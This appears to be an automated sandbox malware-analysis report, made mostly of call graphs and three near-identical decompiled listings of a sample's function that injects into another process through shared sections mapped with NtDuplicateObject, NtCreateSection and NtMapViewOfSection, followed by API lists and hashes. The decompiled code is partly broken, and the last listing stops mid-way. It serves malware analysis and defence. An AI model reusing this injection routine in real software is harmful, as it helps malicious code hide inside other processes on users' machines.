FindHandler 8617->8620 8618 409be9 IsInExceptionSpec 2 API calls 8618->8619 8619->8604 8619->8606 8619->8608 8619->8618 8621 409502 RtlEncodePointer RtlAllocateHeap __getptd 8619->8621 8634 409a45 ___FrameUnwindToState 2 API calls 8619->8634 8642 40a05a 8619->8642 8650 409c64 8619->8650 8622 40a652 FindHandler 2 API calls 8620->8622 8625 40a278 8620->8625 8621->8619 8622->8625 8623 40a2a2 8624 409502 __getptd 2 API calls 8623->8624 8626 40a2a7 8624->8626 8625->8623 8628 40a652 FindHandler 2 API calls 8625->8628 8626->8619 8629 409502 __getptd 2 API calls 8626->8629 8628->8623 8630 40a2b5 8629->8630 8631 409502 __getptd 2 API calls 8630->8631 8632 40a2c0 8631->8632 8636 409be9 8632->8636 8634->8619 8637 409bf5 8636->8637 8641 409bff ___TypeMatch 8636->8641 8638 40a652 FindHandler 2 API calls 8637->8638 8639 409bfa 8638->8639 8640 40a606 FindHandler 2 API calls 8639->8640 8640->8641 8641->8619 8643 40a065 8642->8643 8645 40a072 8642->8645 8644 409fc8 ___BuildCatchObject 2 API calls 8643->8644 8644->8645 8646 409a45 ___FrameUnwindToState 2 API calls 8645->8646 8647 40a097 8646->8647 8648 409cad FindHandler 2 API calls 8647->8648 8649 40a0b8 8648->8649 8649->8619 8651 409c70 8650->8651 8652 409502 __getptd 2 API calls 8651->8652 8653 409c75 8652->8653 8654 409c83 8653->8654 8655 40a652 FindHandler 2 API calls 8653->8655 8656 40a606 FindHandler 2 API calls 8654->8656 8655->8654 8657 409c95 8656->8657 8658 409502 __getptd 2 API calls 8657->8658 8659 409c9a 8658->8659 8661 40a0df 8660->8661 8669 40a1b7 8660->8669 8662 409502 __getptd 2 API calls 8661->8662 8663 40a0e5 8662->8663 8664 409502 __getptd 2 API calls 8663->8664 8668 40a0fe 8663->8668 8665 40a0f3 8664->8665 8667 4092ad _doexit RtlEncodePointer 8665->8667 8666 40a652 FindHandler 2 API calls 8670 40a13b 8666->8670 8667->8668 8668->8666 8668->8669 8668->8670 8669->8604 8670->8669 8671 40a05a FindHandler 2 API calls 8670->8671 8671->8670 8672 401523 8673 401529 8672->8673 8674 401608 NtDuplicateObject 8673->8674 8681 401724 8673->8681 8675 401625 NtCreateSection 8674->8675 8674->8681 8676 4016a5 NtCreateSection 8675->8676 8677 40164b NtMapViewOfSection 8675->8677 8678 4016d1 8676->8678 8676->8681 8677->8676 8679 40166e NtMapViewOfSection 8677->8679 8680 4016db NtMapViewOfSection 8678->8680 8678->8681 8679->8676 8682 40168c 8679->8682 8680->8681 8683 401702 NtMapViewOfSection 8680->8683 8682->8676 8683->8681 8276 40ad26 HeapCreate 8277 40ad4a 8276->8277 8819 40a62a 8820 40a62d 8819->8820 8821 4102fe _abort 2 API calls 8820->8821 8822 40a639 _doexit 8821->8822 8300 4092ad 8301 40923b __encode_pointer RtlEncodePointer 8300->8301 8302 4092b4 8301->8302 8880 40e736 8881 40e744 8880->8881 8882 40e756 8880->8882 8885 40e6e5 8882->8885 8886 40e6f8 8885->8886 8887 40e712 8886->8887 8888 41054f __isctype_l 2 API calls 8886->8888 8888->8887 8906 409bb7 8907 40a606 FindHandler 2 API calls 8906->8907 8908 409bbf 8907->8908 8909 409fb8 8910 40a606 FindHandler 2 API calls 8909->8910 8911 409fc0 _doexit 8909->8911 8910->8911 8684 40193d 8685 40196a 8684->8685 8686 401986 Sleep 8685->8686 8687 4019a1 8686->8687 8688 401558 7 API calls 8687->8688 8689 4019b2 8687->8689 8688->8689 8690 409d3d 8693 409b26 8690->8693 8692 409d45 8694 409b68 8693->8694 8695 409b30 8693->8695 8694->8692 8695->8694 8696 409502 __getptd 2 API calls 8695->8696 8697 409b5c 8696->8697 8697->8692 8912 40cbbe 8913 40cbcc __initterm_e __IsNonwritableInCurrentImage 8912->8913 8915 40cc09 __IsNonwritableInCurrentImage __initterm 8913->8915 8916 4098ff 8913->8916 8919 4098c3 8916->8919 8918 40990c 8918->8915 8920 4098cf _doexit 8919->8920 8925 40cb6b 8920->8925 8924 4098e0 _doexit __cinit 8924->8918 8926 40aed2 __lock RtlEncodePointer 8925->8926 8927 4098d4 8926->8927 8928 4097d8 8927->8928 8929 4097ec __decode_pointer 8928->8929 8938 40987f 8929->8938 8942 410249 8929->8942 8931 409866 8932 40923b __encode_pointer RtlEncodePointer 8931->8932 8935 409874 8932->8935 8933 40983e 8933->8938 8939 4101fb __realloc_crt RtlEncodePointer 8933->8939 8940 409854 8933->8940 8934 40981a 8934->8931 8934->8933 8946 4101fb 8934->8946 8937 40923b __encode_pointer RtlEncodePointer 8935->8937 8937->8938 8938->8924 8939->8940 8940->8938 8941 40923b __encode_pointer RtlEncodePointer 8940->8941 8941->8931 8943 410255 _doexit 8942->8943 8944 40aed2 __lock RtlEncodePointer 8943->8944 8945 410265 _doexit __msize ___sbh_find_block 8943->8945 8944->8945 8945->8934 8949 410204 8946->8949 8948 410243 8948->8933 8949->8948 8950 414443 8949->8950 8953 41444f 7 library calls 8950->8953 8951 40aed2 __lock RtlEncodePointer 8951->8953 8952 414456 _doexit __calloc_impl 8952->8949 8953->8951 8953->8952

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 401558-4015b2 call 4011f5 12 4015b4 0->12 13 4015b7-4015bc 0->13 12->13 15 4015c2-4015d3 13->15 16 4018d7-4018df 13->16 19 4018d5 15->19 20 4015d9-401602 15->20 16->13 21 4018e4-40192f call 4011f5 16->21 19->21 20->19 29 401608-40161f NtDuplicateObject 20->29 29->19 31 401625-401649 NtCreateSection 29->31 33 4016a5-4016cb NtCreateSection 31->33 34 40164b-40166c NtMapViewOfSection 31->34 33->19 35 4016d1-4016d5 33->35 34->33 37 40166e-40168a NtMapViewOfSection 34->37 35->19 38 4016db-4016fc NtMapViewOfSection 35->38 37->33 40 40168c-4016a2 37->40 38->19 41 401702-40171e NtMapViewOfSection 38->41 40->33 41->19 44 401724 41->44 44->19 46 401724 call 401729 44->46 46->19
                                                                                      C-Code - Quality: 79%
                                                                                      			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                      				void* _v8;
                                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                                      				void* _v16;
                                                                                      				void* _v20;
                                                                                      				char _v44;
                                                                                      				char _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				long _v60;
                                                                                      				char _v64;
                                                                                      				void* _v68;
                                                                                      				char _v72;
                                                                                      				void* _v76;
                                                                                      				char _v84;
                                                                                      				char _v88;
                                                                                      				char _v92;
                                                                                      				intOrPtr _v96;
                                                                                      				char _v100;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t87;
                                                                                      				struct _EXCEPTION_RECORD _t90;
                                                                                      				intOrPtr _t91;
                                                                                      				struct _GUID _t97;
                                                                                      				struct _GUID _t99;
                                                                                      				long _t100;
                                                                                      				PVOID* _t121;
                                                                                      				PVOID* _t123;
                                                                                      				intOrPtr _t127;
                                                                                      				struct _EXCEPTION_RECORD* _t132;
                                                                                      				void* _t175;
                                                                                      				struct _EXCEPTION_RECORD _t176;
                                                                                      				struct _EXCEPTION_RECORD* _t183;
                                                                                      				intOrPtr* _t184;
                                                                                      				HANDLE* _t185;
                                                                                      				HANDLE* _t186;
                                                                                      				intOrPtr _t199;
                                                                                      				void* _t200;
                                                                                      				intOrPtr* _t201;
                                                                                      				void* _t205;
                                                                                      
                                                                                      				_push(0x387);
                                                                                      				_t201 = _t200 + 4;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t175, _t205);
                                                                                      				_t127 = _a4;
                                                                                      				_t176 = 0;
                                                                                      				_v56 = 0;
                                                                                      				if(gs != 0) {
                                                                                      					_v56 = _v56 + 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                                                                                      					if(_t87 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                                                      				}
                                                                                      				_v96 = _t87;
                                                                                      				_t183 =  &_v100;
                                                                                      				 *_t183 = _t176;
                                                                                      				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
                                                                                      				_t90 =  *_t183;
                                                                                      				if(_t90 != 0) {
                                                                                      					_t132 =  &_v52;
                                                                                      					 *_t132 = _t90;
                                                                                      					 *(_t132 + 4) = _t176;
                                                                                      					_t184 =  &_v44;
                                                                                      					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
                                                                                      					 *_t184 = 0x18;
                                                                                      					_push( &_v52);
                                                                                      					_push(_t184);
                                                                                      					_push(0x40);
                                                                                      					_push( &_v20);
                                                                                      					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
                                                                                      						_v12 = _t176;
                                                                                      						_t97 =  &_v84;
                                                                                      						 *(_t97 + 4) = _t176;
                                                                                      						 *_t97 = 0x5000;
                                                                                      						_t185 =  &_v88;
                                                                                      						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
                                                                                      							_push(_v84);
                                                                                      							_pop( *_t25);
                                                                                      							_t121 =  &_v72;
                                                                                      							 *_t121 = _t176;
                                                                                      							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
                                                                                      								_t123 =  &_v64;
                                                                                      								 *_t123 = _t176;
                                                                                      								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
                                                                                      									_t199 = _v72;
                                                                                      									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
                                                                                      									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
                                                                                      									_v12 = _v12 + 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t99 =  &_v84;
                                                                                      						 *(_t99 + 4) = _t176;
                                                                                      						 *_t99 = _a12 + 0x10000;
                                                                                      						_t186 =  &_v92;
                                                                                      						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
                                                                                      						if (_t100 != 0) goto L67;
                                                                                      						 *_t100 =  *_t100 + _t100;
                                                                                      					}
                                                                                      				}
                                                                                      				_push(0x15a4);
                                                                                      				_t91 =  *_t201;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t176, _t226);
                                                                                      				return _t91;
                                                                                      			}









































                                                                                      0x00401578
                                                                                      0x00401580
                                                                                      0x00401592
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x004015f8
                                                                                      0x004015f9
                                                                                      0x004015fa
                                                                                      0x004015fc
                                                                                      0x00401602
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401649
                                                                                      0x0040164b
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                      • Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
                                                                                      • Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                      • Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 47 401564-4015b2 call 4011f5 57 4015b4 47->57 58 4015b7-4015bc 47->58 57->58 60 4015c2-4015d3 58->60 61 4018d7-4018df 58->61 64 4018d5 60->64 65 4015d9-401602 60->65 61->58 66 4018e4-40192f call 4011f5 61->66 64->66 65->64 74 401608-40161f NtDuplicateObject 65->74 74->64 76 401625-401649 NtCreateSection 74->76 78 4016a5-4016cb NtCreateSection 76->78 79 40164b-40166c NtMapViewOfSection 76->79 78->64 80 4016d1-4016d5 78->80 79->78 82 40166e-40168a NtMapViewOfSection 79->82 80->64 83 4016db-4016fc NtMapViewOfSection 80->83 82->78 85 40168c-4016a2 82->85 83->64 86 401702-40171e NtMapViewOfSection 83->86 85->78 86->64 89 401724 86->89 89->64 91 401724 call 401729 89->91 91->64
                                                                                      C-Code - Quality: 83%
                                                                                      			E00401564(void* __eax, void* __edx, void* __esi) {
                                                                                      				intOrPtr _t89;
                                                                                      				struct _EXCEPTION_RECORD _t92;
                                                                                      				intOrPtr _t93;
                                                                                      				struct _GUID _t99;
                                                                                      				struct _GUID _t101;
                                                                                      				long _t102;
                                                                                      				PVOID* _t123;
                                                                                      				PVOID* _t125;
                                                                                      				intOrPtr _t129;
                                                                                      				struct _EXCEPTION_RECORD* _t135;
                                                                                      				void* _t179;
                                                                                      				struct _EXCEPTION_RECORD _t180;
                                                                                      				struct _EXCEPTION_RECORD* _t190;
                                                                                      				intOrPtr* _t192;
                                                                                      				HANDLE* _t193;
                                                                                      				HANDLE* _t194;
                                                                                      				void* _t207;
                                                                                      				void* _t208;
                                                                                      				void* _t210;
                                                                                      				intOrPtr* _t211;
                                                                                      				void* _t216;
                                                                                      
                                                                                      				_t216 = __eax + 0x15a4b8;
                                                                                      				_push(0x387);
                                                                                      				_t211 = _t210 + 4;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t179, _t216);
                                                                                      				_t129 =  *((intOrPtr*)(_t208 + 8));
                                                                                      				_t180 = 0;
                                                                                      				 *((intOrPtr*)(_t208 - 0x34)) = 0;
                                                                                      				if(gs != 0) {
                                                                                      					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                      					if(_t89 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
                                                                                      				_t190 = _t208 - 0x60;
                                                                                      				 *_t190 = _t180;
                                                                                      				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
                                                                                      				_t92 =  *_t190;
                                                                                      				if(_t92 != 0) {
                                                                                      					_t135 = _t208 - 0x30;
                                                                                      					 *_t135 = _t92;
                                                                                      					 *(_t135 + 4) = _t180;
                                                                                      					_t192 = _t208 - 0x28;
                                                                                      					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
                                                                                      					 *_t192 = 0x18;
                                                                                      					_push(_t208 - 0x30);
                                                                                      					_push(_t192);
                                                                                      					_push(0x40);
                                                                                      					_push(_t208 - 0x10);
                                                                                      					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
                                                                                      						 *(_t208 - 8) = _t180;
                                                                                      						_t99 = _t208 - 0x50;
                                                                                      						 *(_t99 + 4) = _t180;
                                                                                      						 *_t99 = 0x5000;
                                                                                      						_t193 = _t208 - 0x54;
                                                                                      						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
                                                                                      							 *_t25 =  *(_t208 - 0x50);
                                                                                      							_t123 = _t208 - 0x44;
                                                                                      							 *_t123 = _t180;
                                                                                      							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
                                                                                      								_t125 = _t208 - 0x3c;
                                                                                      								 *_t125 = _t180;
                                                                                      								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
                                                                                      									_t207 =  *(_t208 - 0x44);
                                                                                      									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
                                                                                      									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
                                                                                      									 *(_t208 - 8) =  *(_t208 - 8) + 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t101 = _t208 - 0x50;
                                                                                      						 *(_t101 + 4) = _t180;
                                                                                      						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
                                                                                      						_t194 = _t208 - 0x58;
                                                                                      						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
                                                                                      						if (_t102 != 0) goto L66;
                                                                                      						 *_t102 =  *_t102 + _t102;
                                                                                      					}
                                                                                      				}
                                                                                      				_push(0x15a4);
                                                                                      				_t93 =  *_t211;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t180, _t237);
                                                                                      				return _t93;
                                                                                      			}
























                                                                                      0x00401566
                                                                                      0x00401578
                                                                                      0x00401580
                                                                                      0x00401592
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x004015f8
                                                                                      0x004015f9
                                                                                      0x004015fa
                                                                                      0x004015fc
                                                                                      0x00401602
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401649
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                      • Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
                                                                                      • Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                      • Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 132 401577-4015b2 call 4011f5 139 4015b4 132->139 140 4015b7-4015bc 132->140 139->140 142 4015c2-4015d3 140->142 143 4018d7-4018df 140->143 146 4018d5 142->146 147 4015d9-401602 142->147 143->140 148 4018e4-40192f call 4011f5 143->148 146->148 147->146 156 401608-40161f NtDuplicateObject 147->156 156->146 158 401625-401649 NtCreateSection 156->158 160 4016a5-4016cb NtCreateSection 158->160 161 40164b-40166c NtMapViewOfSection 158->161 160->146 162 4016d1-4016d5 160->162 161->160 164 40166e-40168a NtMapViewOfSection 161->164 162->146 165 4016db-4016fc NtMapViewOfSection 162->165 164->160 167 40168c-4016a2 164->167 165->146 168 401702-40171e NtMapViewOfSection 165->168 167->160 168->146 171 401724 168->171 171->146 173 401724 call 401729 171->173 173->146
                                                                                      C-Code - Quality: 81%
                                                                                      			E00401577() {
                                                                                      				intOrPtr _t86;
                                                                                      				struct _EXCEPTION_RECORD _t89;
                                                                                      				intOrPtr _t90;
                                                                                      				struct _GUID _t96;
                                                                                      				struct _GUID _t98;
                                                                                      				long _t99;
                                                                                      				PVOID* _t120;
                                                                                      				PVOID* _t122;
                                                                                      				intOrPtr _t126;
                                                                                      				struct _EXCEPTION_RECORD* _t132;
                                                                                      				void* _t175;
                                                                                      				struct _EXCEPTION_RECORD _t176;
                                                                                      				struct _EXCEPTION_RECORD* _t184;
                                                                                      				intOrPtr* _t186;
                                                                                      				HANDLE* _t187;
                                                                                      				HANDLE* _t188;
                                                                                      				void* _t201;
                                                                                      				void* _t202;
                                                                                      				void* _t204;
                                                                                      				intOrPtr* _t205;
                                                                                      				void* _t210;
                                                                                      
                                                                                      				asm("repe push 0x387");
                                                                                      				_push(0x387);
                                                                                      				_t205 = _t204 + 4;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t175, _t210);
                                                                                      				_t126 =  *((intOrPtr*)(_t202 + 8));
                                                                                      				_t176 = 0;
                                                                                      				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                      				if(gs != 0) {
                                                                                      					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
                                                                                      					if(_t86 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
                                                                                      				_t184 = _t202 - 0x60;
                                                                                      				 *_t184 = _t176;
                                                                                      				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
                                                                                      				_t89 =  *_t184;
                                                                                      				if(_t89 != 0) {
                                                                                      					_t132 = _t202 - 0x30;
                                                                                      					 *_t132 = _t89;
                                                                                      					 *(_t132 + 4) = _t176;
                                                                                      					_t186 = _t202 - 0x28;
                                                                                      					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
                                                                                      					 *_t186 = 0x18;
                                                                                      					_push(_t202 - 0x30);
                                                                                      					_push(_t186);
                                                                                      					_push(0x40);
                                                                                      					_push(_t202 - 0x10);
                                                                                      					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                      						 *(_t202 - 8) = _t176;
                                                                                      						_t96 = _t202 - 0x50;
                                                                                      						 *(_t96 + 4) = _t176;
                                                                                      						 *_t96 = 0x5000;
                                                                                      						_t187 = _t202 - 0x54;
                                                                                      						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                      							 *_t25 =  *(_t202 - 0x50);
                                                                                      							_t120 = _t202 - 0x44;
                                                                                      							 *_t120 = _t176;
                                                                                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                      								_t122 = _t202 - 0x3c;
                                                                                      								 *_t122 = _t176;
                                                                                      								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                      									_t201 =  *(_t202 - 0x44);
                                                                                      									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
                                                                                      									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                      									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t98 = _t202 - 0x50;
                                                                                      						 *(_t98 + 4) = _t176;
                                                                                      						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                      						_t188 = _t202 - 0x58;
                                                                                      						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                      						if (_t99 != 0) goto L63;
                                                                                      						 *_t99 =  *_t99 + _t99;
                                                                                      					}
                                                                                      				}
                                                                                      				_push(0x15a4);
                                                                                      				_t90 =  *_t205;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t176, _t231);
                                                                                      				return _t90;
                                                                                      			}
























                                                                                      0x00401577
                                                                                      0x00401578
                                                                                      0x00401580
                                                                                      0x00401592
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x004015f8
                                                                                      0x004015f9
                                                                                      0x004015fa
                                                                                      0x004015fc
                                                                                      0x00401602
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401649
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
